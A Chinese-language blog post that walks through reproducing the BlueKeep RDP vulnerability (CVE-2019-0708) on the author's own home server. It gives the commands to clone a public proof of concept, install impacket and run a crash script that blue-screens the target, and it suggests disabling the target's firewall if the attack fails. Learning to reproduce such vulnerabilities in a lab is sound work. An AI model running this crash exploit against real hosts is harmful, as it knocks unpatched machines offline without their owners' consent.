前言:
学习渗透的时候,老师就说这条路不是一帆风顺的,要经过很久的练习。
所以现在,准备每周复现一个漏洞,今天复现的这个漏洞,说来也比较巧,自己在家搭建的esxi里面的家庭影音服务器(2008的系统)恰好被扫出来了这个漏洞,然后自己说好好利用一下
正片开始:
首先自己的电脑用Nessus扫描内网的时候发现了这漏洞
然后我又用goby全局扫描了一下,好家伙,这个虚拟机有这个漏洞没跑了
去github上搜了一下CVE-2019-0708,发现有一个老哥有这个POC,准备开整,不过,开整之前,咱们先把虚拟机做一个快照(毕竟是家庭影音服务器,还有很多资源的)
打开kali,克隆一下大佬的github下来到kali里面
git clone https://github.com/n1xbyte/CVE-2019-0708.git
然后看了一下里面的readme
开整
首先安装一个库
pip3 install impacket
报错了的小伙伴需要先执行这个命令
sudo apt-get install --reinstall python3-pip
pip3 install --upgrade pip
pip --version #查看pip版本
然后在执行
pip3 install impacket
最后一条命令
python3 crashpoc.py 192.168.1.20 64 --用python3+脚本文件+IP地址+64位系统
好的,漏洞利用成功,成功蓝屏,打完收工
修复建议
去下载微软的补丁包吧!
总结
这个漏洞是利用rdp协议来实现的,所以要开目标主机的远程桌面,各位如果利用失败的话,把目标的防火墙也关一下
各位想用CVE-2019-0708的利用脚本的话,我发出来,自己丢到kali里面解压就好了!